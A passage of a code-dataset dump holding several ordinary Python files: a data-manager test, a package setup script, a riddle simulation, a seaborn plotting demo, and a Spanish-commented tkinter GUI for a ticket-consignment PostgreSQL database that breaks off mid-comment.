pagina)\n\n\nentrada.close()\nsaida.close()\n","sub_path":"pythonBook/chapter09/exercise9-16.py","file_name":"exercise9-16.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"574386610","text":"import pytest\nimport hpolib\nfrom hpolib.util.data_manager import NASBench_201Data\nimport shutil\nfrom multiprocessing import Pool\n\n\ndef test_nasbench_201_load_thread_safe():\n shutil.rmtree(hpolib.config_file.data_dir / \"nasbench_201\", ignore_errors=True)\n function = lambda: NASBench_201Data(dataset='cifar100').load()\n with Pool(3) as pool:\n pool.map(function, [])\n\n\ndef test_nasbench_201_get_files():\n\n files = NASBench_201Data.get_files_per_dataset(dataset='cifar10')\n assert len(files) == 18\n assert all([file.startswith('nb201_cifar10') for file in files])\n\n\ndef test_nasbench_201_get_metrics():\n\n metrics = NASBench_201Data.get_metrics()\n assert metrics == ['train_acc1es', 'train_losses', 'train_times',\n 'eval_acc1es', 'eval_times', 'eval_losses']\n\n\ndef test_nasbench_201_init():\n\n data_manager = NASBench_201Data(dataset='cifar100')\n assert len(data_manager.files) == 18\n assert all([file.startswith('nb201_cifar10') for file in data_manager.files])\n\n with pytest.raises(AssertionError):\n NASBench_201Data(dataset='Non_existing_dataset')\n\n assert data_manager._save_dir == hpolib.config_file.data_dir / \"nasbench_201\"\n assert data_manager._save_dir.exists()\n\n\ndef test_nasbench_201_load():\n\n shutil.rmtree(hpolib.config_file.data_dir / \"nasbench_201\", ignore_errors=True)\n\n data_manager = NASBench_201Data(dataset='cifar100')\n data = data_manager.load()\n\n assert len(data) == len(list(NASBench_201Data.get_seeds_metrics()))\n assert len(data) == 3 * len(NASBench_201Data.get_metrics())\n assert (hpolib.config_file.data_dir / \"nasbench_201\").exists()\n assert len(list((hpolib.config_file.data_dir / \"nasbench_201\" / \"data\").glob('*.pkl'))) == 72\n assert not (hpolib.config_file.data_dir / \"nasbench_201_data_v1.1.zip\").exists()\n\n data_manager.data = None\n\n data_manager = NASBench_201Data(dataset='cifar100')\n data = data_manager.load()\n assert len(data) == 3 * len(NASBench_201Data.get_metrics())\n","sub_path":"tests/test_data_manager.py","file_name":"test_data_manager.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"616977599","text":"\nimport os\n\nimport setuptools\nfrom setuptools import setup\n\nfrom textwrap import dedent\n\n\n__version__ = '1.0.44'\n__release__ = '$release 37'\n\nlong_description = 'https://github.com/michael-ross-ven/vengeance/blob/master/README.md (fill this out for pypi.org later)'\n\n\nif __name__ == '__main__':\n setup(name='vengeance',\n version=__version__,\n description='Library focusing on row-major organization of tabular data and control over the Excel application',\n long_description=long_description,\n url='https://github.com/michael-ross-ven/vengeance',\n author='Michael Ross',\n author_email='',\n license='MIT',\n install_requires=('comtypes', 'pypiwin32'),\n extra_require=('numpy', 'python-dateutil', 'ujson', 'line-profiler'),\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: Microsoft :: Windows\"\n ]\n\n )\n","sub_path":"pypi_install_script/vengeance-1.0.44.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"640208493","text":"#Riddler Challenge 11.18.16\n#\n#Logan Noel\n\n\nimport random\nimport matplotlib\nfrom collections import Counter\nimport math\nimport numpy\nimport pylab\nimport time\n\ndef one_game(population):\n while population != 0:\n #print(population)\n people = [True] * population\n #print(people)\n for person in people:\n people[random.randint(0, population - 1)] = False\n people = [i for i in people if i is True]\n population = len(people)\n if population == 1:\n return True\n return False\n\ndef many_games(lower, upper, cycles, step = 1):\n rv = []\n x_rv = []\n for n in range(lower, upper + 1, step):\n x_rv.append(n)\n true_rate = 0\n for i in range(0, cycles + 1):\n if one_game(n):\n true_rate += 1\n hit_percentage = float(true_rate / cycles)\n rv.append(hit_percentage)\n return rv, x_rv\n\ndef plot_whatever(title,xlabel,ylabel,x_axis,y_axis):\n '''\n Plot a function given points & labels\n ''' \n # plot the figure\n pylab.figure()\n pylab.plot(x_axis,y_axis)\n pylab.title(title)\n pylab.xlabel(xlabel)\n pylab.ylabel(ylabel)\n pylab.show()\n\ndef do_sim(lower, upper, cycles, step):\n begin_time = time.time()\n y, x = many_games(lower, upper, cycles, step)\n end_time = time.time()\n print(end_time - begin_time, \"ticks have elapsed\")\n plot_whatever(\"The Lonesome King\", \"Citizens\", \"Chance a winner is crowned\",\n x, y)\n \n \n","sub_path":"riddler11_18.py","file_name":"riddler11_18.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"508424456","text":"#Factorplot draws a categorical plot on a FacetGrid. Using ‘kind’ parameter we\n#can choose the plot like boxplot, violinplot, barplot and stripplot. FacetGrid uses pointplot by default.\n\nimport pandas as pd\nimport seaborn as sb\nfrom matplotlib import pyplot as plt\ndf = sb.load_dataset('exercise')\nsb.factorplot(x = \"time\", y =\" pulse\", hue = \"kind\",data = df);\nplt.show()\n\n\nprint('if you want to print as violine')\ndf1 = sb.load_dataset('exercise')\nsb.factorplot(x = \"time\", y = \"pulse\", hue = \"kind\",kind=\"violine\",data = df1);\nplt.show()\n","sub_path":"factorplot.py","file_name":"factorplot.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"526201973","text":"\"\"\"Interfaz gráfica para la base de datos controltickets. \n Versión:040621 con respecto a la primera versión:140321.\n260521E-1: fue la primera versión encapsulada básica totalmente funcional minimamente.\n020621: presenta por primera vez una función dlookup totalmente completa, no parcial.\n270621: prueba con git-github\"\"\"\n\nimport psycopg2\nfrom datetime import datetime\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tksheet import *\nfrom tkinter import messagebox\nfrom LógicaEmpresarial import * \nconexión = None\n\ntry:\n raíz = Tk()\n conexión = psycopg2.connect(**infoConex)\n\n class GeometríaBase:\n \"Haremos la clase plantilla, con los atributos comunes a las instancias.\"\n def __init__(self, argroot, argconnect, argtipoVentana):\n # Primero, definimos los atributos comunes en todas las instancias que se produzcan con esta clase GeometríaBase (que será el común en todas las ventanas que se instancien con esta clase):\n # Definición de variables comunes de control tkinter enlazadas a sus respecivos widgets:\n # Me permite visivilizar la conexión argconnect en todos los miembros de la clase (atributos-métodos y otros).\n self.conexiónParaTodaLaClase = argconnect\n # Enlazada a self.txtBoxFecha (textvariable = self.fecha).\n self.fecha = StringVar()\n # Variable entera que guarda la posición actual en la lista TodosLosNoConsig igual al no_consig. Se puede obviar y usar directamente los métodos .set y .get de la variable de control, pero para evitar esto y hacer el código más eficiente, usamos esta variable-miembro de clase.\n self.posición = 0\n # Variable de control tkinter para el valor del registro de acceso directo.\n self.Ir_a = IntVar(value=1)\n # Variable de control para los subtotales de los tickets Cartón, que es común para las ventanas que se usarán.\n self.SubTotalTicketsCartón = DoubleVar()\n # Enlazada a self.txtBoxIdCliente (textvariable = self.idCliente)\n self.idCliente = StringVar()\n # Su widget estará invisibilizado hasta que se llame a una actualización o inserción de un nuevo registro.\n self.idClienteComboBox = StringVar()\n #tipoOperación guardará la constante simbólica en forma de cadena del tipo de operación que se invocó según el botón de operación pulsado:\n self.tipoDeOperación = None\n self.tipoVentana = argtipoVentana\n self.ventanaParaTodaLaClase = argroot\n\n # Definición de los widgets comunes:\n # Definimos los cuatro cuerpos principales comunes que conforman la ventana:\n # Creamos el frame común \"self.mainframe1\" para colocar los widgets con los datos de los widgets particulares de tipoVentana:\n self.mainframe1 = ttk.Frame(self.ventanaParaTodaLaClase)\n # En la columna y fila 0 de argroot.\n self.mainframe1.grid(column=0, row=1, sticky=(N, W, E, S))\n\n # Creamos el widget común tipo frame identificado como self.mainframe2 que estará en la mitad vertical de la interfaz y servirá para meter las hojas tksheet para visulizar los tickets:\n self.mainframe2 = ttk.Frame(self.ventanaParaTodaLaClase)\n # En la columna 0 y fila 1 de argroot (mitad vertical).\n self.mainframe2.grid(column=0, row=2)\n\n # El frame común inferior, el que colocamos debajo self.mainframe2, para colocar los botones de navegación:\n # Fijamos la altura en 20 pixeles.\n self.mainframe3 = ttk.Frame(self.ventanaParaTodaLaClase, height=20)\n self.mainframe3.grid(column=0, row=3, sticky=(N, W, E, S))\n\n # Definimos un cuarto cuerpo o subframe llamada self.mainframe4, y lo metemos dentro de self.mainframe2, al lado de los tk sheet que estarán metidos dentro de un cuaderno (consignación) o canvas (división de tickets), para meter los widgets de los montos parciales de los tickets con su uso de la función agregada sum:\n self.mainframe4 = ttk.Frame(self.mainframe2)\n self.mainframe4.grid(column=1, row=0)\n\n # Creamos un subframe a parte para los botones de operaciones (actualizar, confirmar, eliminar), self.mainframe5. No pueden ir en mainframe3 porque me deforma los botones que van a encima de ellos (nuevo, confirmar, abortar in), porque compartirían columnas:\n # 20 pixeles es la altura que estamos usando para las filas.\n self.mainframe5 = ttk.Frame(self.ventanaParaTodaLaClase, height=20)\n self.mainframe5.grid(row=4, sticky=NSEW, column=0)\n \n # Tenemos dos widgets comunes para mainframe1 para los casos de consignación y división de tickets: fecha e idCliente. De modo que los colocamos. La fecha la pondremos en la primera fila, segunda columna, e idcliente lo pondremos en la segunda fila, primera columna:\n # Widgets para el campo o columna Fecha:\n ttk.Label(self.mainframe1, text=\"FECHA\").grid(\n column=3, row=1, sticky=NSEW)\n self.txtBoxFecha = ttk.Entry(\n self.mainframe1, width=9, textvariable=self.fecha)\n self.txtBoxFecha.grid(column=4, row=1, sticky=NSEW)\n self.txtBoxFecha['state'] = \"readonly\"\n\n # Widgets para el campo o columna IdCLIENTE:\n ttk.Label(self.mainframe1, text=\"IdCLIENTE\").grid(\n column=1, row=2, sticky=NSEW)\n self.txtBoxIdCliente = ttk.Entry(\n self.mainframe1, width=6, textvariable=self.idCliente)\n self.txtBoxIdCliente.grid(column=2, row=2, sticky=NSEW)\n self.txtBoxIdCliente['state'] = 'readonly'\n\n # El widget común combobox que se visualizará eventualmente para el campo o columna IdCLIENTE cuando se vaya a actualizar o a ingresar nuevos registros:\n # textvariable se actualizará automáticamente con el valor seleccionado en el combobox (genera un evento virtual <>, cada vez que se selecciona un valor de su lista de valores value, o se introduce un texto en el caso de que se use como combinación entry y listbox.\n self.comboBoxIdCliente = ttk.Combobox(\n self.mainframe1, width=6, textvariable=self.idClienteComboBox)\n self.comboBoxIdCliente.grid(column=2, row=2, sticky=NSEW)\n self.comboBoxIdCliente['state'] = 'readonly'\n self.comboBoxIdCliente.grid_remove() # Le aplicamos grid_remove: método que lo invisibiliza (el widget existe, está todo el tiempo en mainframe1 pero oculto) y que con grid(), lo volvemos a visibilizar con todos los valores originales en sus atributos. Su estado normal será estar invisible, porque para navegar por los registros, usaremos txtBoxIdCliente para visualizar idCliente.\n\n # Todos los botones son comunes a los tipos de ventana que se instanciaran, así que ponemos los botones en sus mainframe correspondientes, self.mainframe3 y self.mainframe5, en esta clase GeometríaBase:\n # Colocamos los botones de navegación sobre las consignaciones dentro de self.mainframe3. Como podemos repasar, en los parámetros con nombre, no importa su posición.\n # Usaremos funciones anónimas (lambda) para poder pasar el parámetro \"tipoAcción\" al método referido, porque usaremos un sólo método para todos los botones de navegación, en plan de racionalizar el código.\n # Los crearemos como atributos de la clase (self.) porque serán manipulados desde atributos-métodos de esta misma clase:\n self.botónPrimer = ttk.Button(\n self.mainframe3, command=lambda: self.BotónPulsado(\"primero\"), text=\"<<\", width=3)\n self.botónPrimer.grid(column=0, row=1, sticky=NSEW)\n self.botónRetro = ttk.Button(\n self.mainframe3, text=\"<\", width=2, command=lambda: self.BotónPulsado(\"retroceso\"))\n self.botónRetro.grid(column=1, row=1, sticky=NSEW)\n self.botónAvance = ttk.Button(\n self.mainframe3, width=2, command=lambda: self.BotónPulsado(\"avance\"), text=\">\")\n self.botónAvance.grid(column=2, row=1, sticky=NSEW)\n self.botónUltimo = ttk.Button(\n self.mainframe3, text=\">>\", command=lambda: self.BotónPulsado(\"último\"), width=3)\n self.botónUltimo.grid(column=3, row=1, sticky=NSEW)\n self.botónIrA = ttk.Button(self.mainframe3, text=\"Ir a:\",\n command=lambda: self.BotónPulsado(\"ir_a\"), width=3)\n self.botónIrA.grid(column=4, row=1, sticky=NSEW)\n\n # Como este cuadro de texto no se manipula, no se declara como miembro-atributo de la clase (self.):\n ttk.Entry(self.mainframe3, width=3,\n textvariable=self.Ir_a).grid(column=5, row=1)\n\n # Creamos los botones de acción de insertar nuevos registros, modificar y eliminar. Como estos botones\n # invocan métodos específicos de ingreso o deshabilitaciones, no usan funciones anónimas lambda, si no que refieren a procedimientos normales:\n self.botónNuevoRegis = ttk.Button(\n self.mainframe3, text=\"Nuevo\", command=lambda: self.BotónPulsado(\"nuevo\"), width=5)\n self.botónNuevoRegis.grid(column=6, row=1, sticky=NSEW)\n #Recuerde que la invocación del método convencional para command no lleva paréntesis:\n self.botónIngresar = ttk.Button(\n self.mainframe3, text=\"Confirm\", command=self.Insertar, width=7, state=DISABLED) \n self.botónIngresar.grid(column=7, row=1, sticky=NSEW)\n \n # Metemos los botones de actualización y eliminación en mainframe5:\n self.botónUpdate = ttk.Button(\n self.mainframe5, text=\"Actualizar\", command=lambda: self.BotónPulsado(\"actualización\"), width=9)\n self.botónUpdate.grid(column=1, row=1, sticky=NSEW)\n self.botónEliminar = ttk.Button(\n self.mainframe5, text='Eliminar', command=self.Eliminar, width=7)\n self.botónEliminar.grid(column=3, row=1, sticky=NSEW)\n # Su estado normal es deshabilitado:\n self.botónConfirmUpDate = ttk.Button(\n self.mainframe5, text='ConfirmUpDate', command=self.Actualizar, width=14, state=DISABLED) \n self.botónConfirmUpDate.grid(column=2, row=1, sticky=NSEW)\n\n # Ahora, filtramos según tipo ventana con que instanciamos a GeometríaBase, para definir los widgets y las variables de control específicas, no comunes, del tipoVentana:\n if self.tipoVentana == \"principal\":\n # Variables de control específicas para tipo de ventana consignación:\n self.ventanaParaTodaLaClase.title(\"CONSIGNACIÓN\")\n # Hacemos una lista con todos los valores no_consignación de la tabla consignación. Retornará una lista de listas de un solo elemento de\n # la forma [[1], [2], ...[último no_consig]] que debe convertirse a lista sencilla [1, 2, ...último no_consig] con la función ConversorListaSencilla:\n self.todosLosNo_Consigna = conversorListaSencilla(ResultadoConsulta(\n self.conexiónParaTodaLaClase, \"select no_consignación from consignación order by no_consignación asc\"))\n \n # Enlazada a self.txtBoxNoCONSIG (textvariable = self.no_consig). Inicializamos con el registro de la primera posición:\n self.no_consig = IntVar()\n # Enlazada a self.txtBoxEntregó (textvariable = self.entregó):\n self.entregó = StringVar()\n self.SubTotalTicketsBanco1 = DoubleVar()\n self.TotalTickets = DoubleVar()\n self.TotalTicketsPorcent = DoubleVar()\n \n # Segunda Parte: creación de los widgets y su colocación dentro de la interfaz:\n # Creamos el widget de barra de menú en la interfaz que se situará por defecto en la parte superior, independientemente de los frame que se introduzcan en la raíz tksheet originaria:\n self.barraMenú = Menu(self.ventanaParaTodaLaClase)\n # Con la opción de configuración menu del widget dónde irá el menú (que la interfaz raíz), visibilizamos el menú: es remotamente equivalente al grid.\n # La propiedad menu del widget, en este caso la interfaz raíz, tendrá como valor el menú que instanciamos sobre el, y que apuntamos con el identificador barraMenú.\n self.ventanaParaTodaLaClase['menu'] = self.barraMenú\n\n # Agregamos los menú a la barra de menú que creamos con el identificador barraMenú:\n # Para aspecto moderno y no desacoplable de los menú, antes de crear cualquiera de ellos, colocamos esta proposición:\n self.ventanaParaTodaLaClase.option_add('*tearOff', FALSE)\n # Creamos el primer menú contenido en barraMenú, apuntado por el identificador operarTablas:\n self.operarTablas = Menu(self.barraMenú)\n # Creamos otro menú que ya veremos que le agregamos. Puede ser versión, ayuda, acerca de, etc.\n self.otrasOperaciones = Menu(self.barraMenú)\n # Agregamos los menú creado en la barra de menú barraMenú.\n self.barraMenú.add_cascade(\n label=\"TABLA\", menu=self.operarTablas)\n self.barraMenú.add_cascade(\n label=\"OTRAS\", menu=self.otrasOperaciones)\n\n # Agregamos los comandos a los menús:\n # Tiene que ser una función-atributo-método convencional porque implica dos proposiciones.\n self.operarTablas.add_command(\n label=\"Divisiones Hechas\", command=self.EmergenteDivisionesHechas)\n # lambda: GeometríaVentanaTicketCarGenerados(argroot, self.conexiónParaTodaLaClase))\n self.operarTablas.add_command(\n label=\"Tickets Cartón Generados\", command=\"\")\n self.otrasOperaciones.add_command(\n command=\"\", label=\"Comando x\")\n self.otrasOperaciones.add_command(label=\"Comando z\")\n\n # Widgets para el campo o columna Consignación de la base de datos controltickets:\n ttk.Label(self.mainframe1, text=\"NoCONSGINACIÓN\").grid(\n column=1, row=1, sticky=NSEW)\n # Lo creamos deshabilitado. Como está deshabilitado, no se podrá apreciar el estilo.\n self.txtBoxNoCONSIG = ttk.Entry(\n self.mainframe1, width=3, textvariable=self.no_consig, state=DISABLED, style=\"estiloE1.TEntry\")\n self.txtBoxNoCONSIG.grid(column=2, row=1, sticky=NSEW)\n # self.txtBoxNoCONSIG['state']=\"enabled\" #Y con esta proposición la habilitamos. El atributo state de esta clase tiene una lista de tres posibles valores: enabled, disabled y readonly. Fijese que podemos creal el widget con su condición inicial, o asignarla luego, como aquí.\n\n # Widgets para el campo o columna Entregó:\n ttk.Label(self.mainframe1, text=\"ENTREGÓ\").grid(\n column=3, row=2, sticky=NSEW)\n self.txtBoxEntregó = ttk.Entry(\n self.mainframe1, width=9, textvariable=self.entregó)\n self.txtBoxEntregó.grid(column=4, row=2, sticky=NSEW)\n self.txtBoxEntregó['state'] = 'readonly'\n\n # Y metemos el cuaderno (sin pestañas aún) dentro de self.mainframe2. Como lo referiremos en otros métodos de la clase, debe ser un miembro de la clase, así que lo declaramos con el calificativo self:\n # Como mainframe2 es de tamaño automático, ajustable a los widgets que se le metan, se pondrá de alto a la altura que se le dió al cuaderno (130):\n self.cuaderno = ttk.Notebook(\n self.mainframe2, height=130, width=200)\n self.cuaderno.grid(column=0, row=0)\n\n # Creamos, instanciamos los objetos hojas de la clase tksheet, que metemos dentro del cuaderno. Como las hojas son objetos gráficos si van a cambiar, modificadas desde métodos miembros de la clase, se declaran como miembros de la clase (.self):\n self.hojaTicketBanco1 = Sheet(\n self.cuaderno, column_width=70, align=\"center\", header_align=\"center\")\n self.hojaTicketCartón = Sheet(\n self.cuaderno, column_width=70, align=\"center\", header_align=\"center\")\n\n # Y así le modificamos el nombre a los encabezados, con el atributo headers de la clase Sheet:\n # Fíjese que el parámetro imprescindible es la tupla de los nuevos nombres de los encabezados. El nombre de parámetro es opcional en esta caso.\n self.hojaTicketBanco1.headers(newheaders=(\"REF\", \"MONTO\"))\n # El uso del nombre del parámetro (newheaders) es prescindible. Fijese que esta vez metimos una lista. Es indiferente usar listas o tuplas para ello, siempre y cuando sea un iterable.\n self.hojaTicketCartón.headers([\"IdCARTÓN\", \"MONTO\"])\n\n # Posicionamos las hojas dentro de cuaderno. Si no específicamos nada, las pondrá una al lado de otra en el orden que fueron creadas:\n self.hojaTicketBanco1.grid()\n self.hojaTicketCartón.grid()\n\n # A vaina loca, metí las hojas de cuaderno al mismo tiempo que las creo agregándolas:\n # Por último metemos las hojas (pestañas) del cuaderno y las apuntamos con identificadores porque las referiremos desde otras partes de programa más tarde:\n self.cuaderno.add(self.hojaTicketBanco1, text='TicketBanco1')\n self.cuaderno.add(self.hojaTicketCartón, text='TicketCartón')\n\n # Ahora metemos los widgets de los montos parciales por tipo de tickes, y total a transferir por porcentaje (no todos se le cobra el mismo porcentaje) dentro de self.mainframe4:\n # Para los tickets de Banco1:\n ttk.Label(self.mainframe4, text=\"SubTotalTicketBanco1:\").grid(\n column=1, row=1, sticky=NSEW)\n self.txtBoxTicketBanco1 = ttk.Entry(\n self.mainframe4, width=10, textvariable=self.SubTotalTicketsBanco1)\n self.txtBoxTicketBanco1.grid(column=1, row=2)\n self.txtBoxTicketBanco1['state'] = \"readonly\"\n\n # Para los tickets cartón:\n ttk.Label(self.mainframe4, text=\"SubTotalTicketCartón:\").grid(\n column=1, row=3, sticky=NSEW)\n self.txtBoxTicketCartón = ttk.Entry(\n self.mainframe4, width=10, textvariable=self.SubTotalTicketsCartón)\n self.txtBoxTicketCartón.grid(column=1, row=4)\n self.txtBoxTicketCartón['state'] = \"readonly\"\n\n # Para el subtotal de todos los tickets:\n ttk.Label(self.mainframe4, text=\"SubTotalTickets:\").grid(\n column=1, row=5, sticky=NSEW)\n self.txtBoxTotalTicket = ttk.Entry(\n self.mainframe4, width=10, textvariable=self.TotalTickets)\n self.txtBoxTotalTicket.grid(column=1, row=6)\n self.txtBoxTotalTicket['state'] = \"readonly\"\n\n # Para el subtotal de todos los tickets menos el porcentaje:\n ttk.Label(self.mainframe4,\n text=\"SubTotalTickets - x%:\").grid(column=1, row=7, sticky=NSEW)\n self.txtBoxTicketCartón = ttk.Entry(\n self.mainframe4, width=10, textvariable=\"\")\n self.txtBoxTicketCartón.grid(column=1, row=8)\n self.txtBoxTicketCartón['state'] = \"readonly\"\n\n # Finalmente, le damos los valores contenidos a los widgets, pulsando el botón primer registro:\n if self.tipoVentana == \"secundaria\":\n # Variables de control específicas para la ventana secundaria, divisiones hechas:\n self.ventanaParaTodaLaClase.title(\"DIVISIONES HECHAS\")\n #Tenemos que obtener la lista de forma ascendente (asc), porque además de usarla para ver cantidad de registros, la necesitamos para obtener el último registro ingresado:\n self.todosLosIdDivisión = conversorListaSencilla(ResultadoConsulta(\n self.conexiónParaTodaLaClase, \"select id_división from divisiones_hechas order by id_división asc\"))\n self.idDivisión = IntVar(value=1)\n self.punto = StringVar() # Enlazada a self.txtBoxEntregó (textvariable = self.entregó)\n self.puntoComboBox = StringVar()\n self.SubTotalTicketsRecibidos = DoubleVar()\n self.ref_sec = IntVar()\n self.monto = DoubleVar()\n\n # Definimos sus widgets:\n ttk.Label(self.mainframe1, text=\"IdDIVISIÓN\").grid(\n column=1, row=1, sticky=NSEW)\n self.txtBoxIdDivisión = ttk.Entry(\n self.mainframe1, width=3, textvariable=self.idDivisión, state=DISABLED, style=\"estiloE1.TEntry\")\n self.txtBoxIdDivisión.grid(column=2, row=1, sticky=NSEW)\n\n # Widgets para el campo o columna punto:\n ttk.Label(self.mainframe1, text=\"PUNTO\").grid(\n column=3, row=2, sticky=NSEW)\n self.txtBoxPunto = ttk.Entry(\n self.mainframe1, width=9, textvariable=self.punto)\n self.txtBoxPunto.grid(column=4, row=2, sticky=NSEW)\n self.txtBoxPunto['state'] = 'readonly'\n\n # Widget tipo combobox para el campo punto que aparecerá temporalmente en los procesos de actualización e inserción de nuevos registros en la tabla :\n self.comboBoxPunto = ttk.Combobox(\n self.mainframe1, width=6, textvariable=self.puntoComboBox)\n self.comboBoxPunto.grid(column=4, row=2, sticky=NSEW)\n self.comboBoxPunto['state'] = 'readonly'\n self.comboBoxPunto.grid_remove()\n\n # Widgets para el campo o columna ref_sec:\n ttk.Label(self.mainframe1, text=\"REF/SEC\").grid(\n column=1, row=3, sticky=NSEW)\n self.txtBoxRef_Sec = ttk.Entry(\n self.mainframe1, width=9, textvariable=self.ref_sec)\n self.txtBoxRef_Sec.grid(column=2, row=3, sticky=NSEW)\n self.txtBoxRef_Sec['state'] = 'readonly'\n\n # Widgets para el campo o columna monto:\n ttk.Label(self.mainframe1, text=\"MONTO\").grid(\n column=3, row=3, sticky=NSEW)\n self.txtBoxMonto = ttk.Entry(\n self.mainframe1, width=9, textvariable=self.monto)\n self.txtBoxMonto.grid(column=4, row=3, sticky=NSEW)\n self.txtBoxMonto['state'] = 'readonly'\n\n # Atención: Si no meto la hoja dimensionada (height= 200, width = 200),\n # se meterá en el mainframe2, y \"estirará\" a este con el mayor tamaño prefijado por tksheet. En el caso de consignación no pasa,\n # porque el cuaderno se le dió un tamaño determinado. Recuerde que mainframe2, como cualquier ttk.Frame, se ajusta automáticamente a los widgets que se le metan, al menos que su propiedad grid_propagate esté apagada (False).\n self.hojaTicketCartón = Sheet(\n self.mainframe2, column_width=70, align=\"center\", header_align=\"center\", height=130, width=200)\n #Note que hay dos tipos de self.hojaTiketsCartón: la de \"principal\" (consignación), que corresponde a la tabla tickets_cartón_recibidos, y este, a la tabla tickets_cartón_emitidos.\n self.hojaTicketCartón.headers([\"IdCARTÓN\", \"MONTO\"])\n self.hojaTicketCartón.grid(column=0, row=0)\n\n ttk.Label(self.mainframe4, text=\"SubTotalTicketCartón:\").grid(\n column=0, row=0, sticky=N)\n self.txtBoxTicketCartón = ttk.Entry(\n self.mainframe4, width=10, textvariable=self.SubTotalTicketsCartón)\n self.txtBoxTicketCartón.grid(column=0, row=1, sticky=N)\n self.txtBoxTicketCartón['state'] = \"readonly\"\n\n ttk.Label(self.mainframe4,\n text=\"SubTotalTickets - x%:\").grid(column=0, row=2, sticky=N)\n self.txtBoxTicketCartón = ttk.Entry(\n self.mainframe4, width=10, textvariable=\"\")\n self.txtBoxTicketCartón.grid(column=0, row=3)\n self.txtBoxTicketCartón['state'] = \"readonly\"\n\n # Cuarta y última parte: definimos los métodos que invocan los botones (tanto los de navegación, como los operativos). En los de navegación adoptamos el enfoque de\n # funciones lambdas en los argumentos command=, que permiten el uso de parámetros, y así poder usar un sólo método para todos los botones de navegación y no repetir n-botones el mísmo código n-veces para actualizar los widgets de datos ttl.Entry de mainframe1 y los tksheet en el cuaderno de pestañas:\n # Para los botones de operación (inserción y actualización), si utilizamos el llamado a procedimientos convencionales python:\n\n def BotónPulsado(self, *args):\n # print(\"Imprimir: \", args) #Fijese como se reciben los valores enviados desde las funciones lambdas\n # en los command. Lo que manda es una tupla de valores, en este caso los botones mandan una tupla de un sólo elemento.\n # De modo que args es una tupla de un sólo elemento, (x, ), por ello para acceder a dicho valor, hay que referenciar con [0].\n # Como python no tiene swicht-case, usamos una seguidilla de if para ver en que posición vamos a poner self.posición, para la consecuente creación de los cursores con las respectivas sentencia sql según la columna no_consignación de la tabla consignación, en función de self.posición:\n # Primero que todo, determinamos todos los valores de la clave principal que recorrerá self.posición, según el tipoVentana:\n if self.tipoVentana == \"principal\":\n todosLosValores = self.todosLosNo_Consigna\n else:\n todosLosValores = self.todosLosIdDivisión\n\n # Y ahora aplicamos el condicional que corresponda sobre el tipo de ventana que se determinó arriba, que se está usando aquí:\n if args[0] == \"primero\":\n # Colocamos self.posición en la primera:\n self.posición = 0\n\n if args[0] == \"retroceso\":\n # Condición validadora de que no estamos en la primera posición (self.posición=0).\n if self.posición > 0:\n # Decrementamos la variable posición para retroceder al registro anterior.\n self.posición = self.posición-1\n else:\n pass\n\n if args[0] == \"avance\":\n if (self.posición) < len(todosLosValores) - 1:\n # Incrementamos la variable posición para avanzar al siguiente registro en la tabla.\n self.posición = self.posición+1\n else:\n pass\n\n if args[0] == \"último\":\n self.posición = len(todosLosValores) - 1\n\n if args[0] == \"ir_a\":\n # Colocamos self.posición al registro que queremos acceder directamente:\n if self.Ir_a.get() in todosLosValores:\n self.posición = todosLosValores.index(self.Ir_a.get())\n else:\n messagebox.showerror(\n message=\"Ese registro no existe.\", title='Error')\n\n # Una vez determinada la posición con los if anteriores, invocamos la función ResultadoConsulta según el tipo de ventana que lo invoca, resultado de la evaluación de los if de arriba, que emulan un swicht-case,\n # Para rellenar los widgets con su información respectiva según el registro en que lo sitúe self.posición:\n if self.tipoVentana == \"principal\":\n resultConsig = ResultadoConsulta(\n self.conexiónParaTodaLaClase, \"select no_consignación, fecha, entregó, id_cliente from consignación where no_consignación = %s\" % self.todosLosNo_Consigna[self.posición])[0] # Tomára el primer registro (la primera lista) de la lista de listas.\n # Le asignamos los valores a las variables de control tkinter del formulario principal de self.mainframe1, según los valores posicionales de la lista ResultadoConsulta:\n self.no_consig.set(resultConsig[0])\n self.fecha.set(resultConsig[1])\n self.entregó.set(resultConsig[2])\n self.idCliente.set(resultConsig[3])\n \n # Recuerde que el método ResultadoConsulta() retorna una lista de listas, que puede ser de una sola lista (consignación), o varias (tickets para los tksheet).\n self.hojaTicketBanco1.set_sheet_data(ResultadoConsulta(\n self.conexiónParaTodaLaClase, \"select ref, monto from ticket_banco1 where no_consignación = %s\" % self.todosLosNo_Consigna[self.posición]))\n self.hojaTicketCartón.set_sheet_data(ResultadoConsulta(\n self.conexiónParaTodaLaClase, \"select id_cartón, monto from ticket_cartón_recibidos where no_consignación = %s\" % self.todosLosNo_Consigna[self.posición]))\n\n # Procedemos a llenar los subtotales de los tickets. Utilizamos aquí la función agregada sum en la sentencia sql:\n # Recuerde que ResultadoConsulta retorna una lista de listas. [0][0] es el primer y único elemento de la primera y única lista en la lista de listas:\n resulConsulTiketsBanco1 = ResultadoConsulta(\n self.conexiónParaTodaLaClase, \"select sum(monto) as total from ticket_banco1 where no_consignación = %s\" % self.todosLosNo_Consigna[self.posición])[0][0]\n resulConsulTiketsCartón = ResultadoConsulta(\n self.conexiónParaTodaLaClase, \"select sum(monto) as total from ticket_cartón_recibidos where no_consignación = %s\" % self.todosLosNo_Consigna[self.posición])[0][0]\n\n # Posiblemente alguna consignación no tenga ni un ticket de alguno de los tipos de ticket en específico arrojando un None por su ResultadoConsulta. Para evitar el None hay que evaluar primero el resultado y luego asignarlo:\n if resulConsulTiketsBanco1 is None:\n resulConsulTiketsBanco1 = 0\n if resulConsulTiketsCartón is None:\n resulConsulTiketsCartón = 0\n self.SubTotalTicketsBanco1.set(resulConsulTiketsBanco1)\n self.SubTotalTicketsCartón.set(resulConsulTiketsCartón)\n\n # Fijese el tratamiento de las variables de control tkinter para obtener el 